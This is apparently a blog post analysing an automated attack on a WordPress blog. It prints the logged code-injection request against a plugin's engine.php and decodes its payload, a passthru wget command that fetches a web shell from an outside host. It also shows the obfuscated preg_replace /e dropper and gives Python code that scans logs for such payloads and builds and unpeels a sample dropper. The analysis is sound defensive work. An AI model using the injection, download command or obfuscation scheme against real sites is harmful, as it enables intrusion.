Automated or manual attack?

2011, Dec 04    

Today I received a notification about an automated attack against this blog. Nothing new, however, I was curious about how exactly it works and decided to take a brief look at the attack to answer a few questions:

  • What vulnerability is this exploiting? Am I vulnerable?
  • What does the payload do?
  • Is this an automated attack or a manually launched one?

The attack in the logs

Since I installed the Mute Screamer plugin for WordPress I regularly receive attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following request appears:

/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));

So this is an exploit for a PHP code injection vulnerability in “engine.php”: the value of the type parameter ends up inside code that the plugin evaluates, so the attacker supplies ih_options(); to close the call the plugin expects and appends an eval(base64_decode(...)); of his own. A quick search for the vulnerability turned up this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don’t have this plugin installed, so the first two questions are already answered. Time for the next one: what does the payload do?

Analyzing the payload

In the generated log file we can clearly see the code the exploit is trying to inject, base64 encoded. Decoding it we get the following:

  >>> import base64
  >>> base64.b64decode("cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7")
  "passthru('wget http://www.sck.obecvrbov.sk/wp-content/uploads/fgallery/sh.txt; mv sh.txt log.php');"
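Decoding one entry by hand is fine, but the same pattern turns up in request logs all the time. The following is an added Python example (not code from the original post or from the Mute Screamer plugin) that scans request lines for the eval(base64_decode(...)) pattern, URL-decodes each line first so that a percent-encoded variant is not missed, decodes the payload and flags shell primitives found in it. The three log lines are constructed for the example; the second one carries the base64 string from the log entry above, the third a made-up percent-encoded payload.

```python
import base64
import re
from urllib.parse import unquote

# Constructed request lines (not from the original log): a benign one, the injection from
# the post's log entry, and a percent-encoded variant of the same trick.
SAMPLE_LOG = """\
GET /blog/index.php?p=12 HTTP/1.1
GET /blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7)); HTTP/1.1
GET /blog/engine.php?type=x%3Beval%28base64_decode%28ZWNobyAnaGknOw%3D%3D%29%29%3B HTTP/1.1
"""

# eval(base64_decode(<base64>)) with optional quotes and whitespace around the argument.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)",
    re.IGNORECASE)

# Shell/PHP primitives whose presence in a decoded payload deserves a flag (extend to taste).
SUSPICIOUS = ("passthru", "system(", "exec(", "shell_exec", "popen", "wget ", "curl ")


def decode_injected_payloads(request_line):
    """URL-decode one request line and return the decoded text of every eval(base64_decode()) in it."""
    line = unquote(request_line)   # %28 -> "(" etc.; '+' is left alone because base64 uses it
    payloads = []
    for m in EVAL_B64.finditer(line):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:         # bad padding or stray characters: not a decodable payload
            continue
        payloads.append(raw.decode("latin-1"))   # latin-1 never fails; the payload is PHP source
    return payloads


def scan_log(text):
    """Return [(line_no, decoded_payload, [flags])] for every line carrying such an injection."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for payload in decode_injected_payloads(line):
            flags = [s.strip(" (") for s in SUSPICIOUS if s in payload]
            findings.append((n, payload, flags))
    return findings


if __name__ == "__main__":
    for n, payload, flags in scan_log(SAMPLE_LOG):
        print("line %d: %r  flags=%s" % (n, payload, flags))
```

Run against a real access log the scanner reports line 2 with the wget/passthru payload and line 3 with the percent-encoded one; line 1 produces nothing. Decoding before matching matters: the third line contains neither "eval(" nor "base64_decode(" literally.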

The passthru() function executes an operating system command and sends the raw output of the command straight to the browser (not that the output matters in this particular exploit). So the attacker downloads a file with wget and renames it to log.php with mv; since wget writes into the web server’s current working directory, the attacker can presumably then reach log.php over HTTP just like any other script on the site. The file the exploit downloads looks like this:

  <?php
  $auth_pass = "";
  $color = "#df5";
  $default_action = 'FilesMan';
  $default_use_ajax = true;
  $default_charset = 'Windows-1251';
  preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[[BASE64 CODE]]'\x29\x29\x29\x3B",".");

Looking at this it is clear that preg_replace is executing something, but what, and how? My guess was that the “/e” modifier on the regular expression makes preg_replace evaluate the replacement as PHP code for each match, and I was right: with /e (PREG_REPLACE_EVAL, deprecated in PHP 5.5 and removed in PHP 7) the replacement string is handed to eval() after back-references have been substituted. The replacement here is written almost entirely as \xNN escape sequences, which PHP resolves inside a double-quoted string, so the word “eval” never appears literally in the file. Because the regex is “.*” it matches the whole subject string (here just “.”), and the code that gets executed is the following:

  eval(gzinflate(base64_decode('[[BASE64 CODE]]')));

So the code is base64 encoded and compressed, but note that gzinflate() undoes a raw DEFLATE stream, not the gzip format: the data carries no zlib or gzip header, which is why Python’s zlib needs a zlib header ('x\x9c') prepended (or a negative wbits for raw streams) before it will decompress it. Let’s decode and decompress it:

  >>> x = base64.b64decode("7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jT…AYT72vwA=")
  >>> import zlib
  >>> ungziped_str = zlib.decompressobj().decompress('x\x9c' + x)
  >>> print ungziped_str[:100]
  if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archi…

Finally we have the real code that will be executed! A copy of the unobfuscated and formatted source is here. The first thing it does is compare the User-Agent against a list of search engine crawlers (Google, Slurp, MSNBot and others), presumably so that the planted script never ends up indexed; the rest is a common web shell of the kind typically dropped by automated attacks.
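The whole chain, from the \xNN-escaped preg_replace replacement down to the inflated code, can be automated. The following is an added Python example, not code from the original post: it first builds a constructed sample file with the same layout as the dropped log.php (inner code compressed as raw DEFLATE, base64 encoded and wrapped in a preg_replace("/.*/e", "<hex escapes>", ".") call), then peels the layers back off. The inner PHP is made up and stands in for the real shell body; the helper names are mine. Unlike the session above, which prepends a fake zlib header, it asks zlib for raw DEFLATE directly with a negative wbits; both approaches work.

```python
import base64
import re
import zlib

# Constructed stand-in for the real shell body (the real one is thousands of characters long).
SAMPLE_INNER_PHP = (
    "if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array(\"Google\", \"Slurp\", \"MSNBot\"); }\n"
    "echo 'constructed sample body';\n"
)


def php_hex_escape(data):
    """Write bytes the way the dropper does: as \\xNN escapes valid in a PHP double-quoted string."""
    return "".join("\\x%02X" % b for b in data)


def build_sample_dropper(inner_php):
    """Build a file with the same layout as the downloaded log.php around constructed inner code.
    PHP's gzinflate() undoes raw DEFLATE, so the sample is compressed with wbits=-15 (no header)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = comp.compress(inner_php.encode("utf-8")) + comp.flush()
    b64 = base64.b64encode(deflated).decode("ascii")
    replacement = (php_hex_escape(b"eval(gzinflate(base64_decode(") + "'" + b64 + "'"
                   + php_hex_escape(b")));"))
    return '<?php\n$auth_pass = "";\npreg_replace("/.*/e","%s",".");\n' % replacement


HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
PREG_REPLACE = re.compile(r'preg_replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
B64_ARG = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def unescape_php_hex(s):
    """Resolve \\xNN escapes exactly as PHP does when it parses a double-quoted string."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def gzinflate(data):
    """Python equivalent of PHP gzinflate(): a raw DEFLATE stream, hence wbits=-15."""
    return zlib.decompress(data, -15)


def peel_dropper(php_source):
    """Return (stage1, stage2): the code the /e modifier hands to eval(), and the code eval() then runs."""
    m = PREG_REPLACE.search(php_source)
    if not m:
        raise ValueError('no preg_replace("...","...","...") call found')
    pattern, replacement = m.group(1), m.group(2)
    modifiers = pattern.rsplit(pattern[0], 1)[1]   # text after the closing delimiter
    if "e" not in modifiers:
        raise ValueError("pattern has no /e modifier, so the replacement is a plain string")
    stage1 = unescape_php_hex(replacement)
    b = B64_ARG.search(stage1)
    if not b:
        raise ValueError("evaluated code has no base64_decode('...') argument")
    stage2 = gzinflate(base64.b64decode(b.group(1))).decode("utf-8", errors="replace")
    return stage1, stage2


if __name__ == "__main__":
    dropper = build_sample_dropper(SAMPLE_INNER_PHP)
    print(dropper)
    stage1, stage2 = peel_dropper(dropper)
    print("stage 1:", stage1[:60] + "...")
    print("stage 2:", stage2)
```

On a real sample, feed the file contents to peel_dropper() and diff stage2 against the formatted source; if zlib complains about a header check, the inner data was compressed with gzcompress() or gzencode() instead of gzdeflate(), and the wbits value has to change accordingly.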

Conclusion

I cannot be 100% sure whether it was an automated or a manual attack but my guess is that this was simply a blind automated attack launched against many web sites, this blog among them: the exploit targets a plugin that isn’t even installed here, which is exactly what a scanner spraying one known exploit at every WordPress site it finds would do.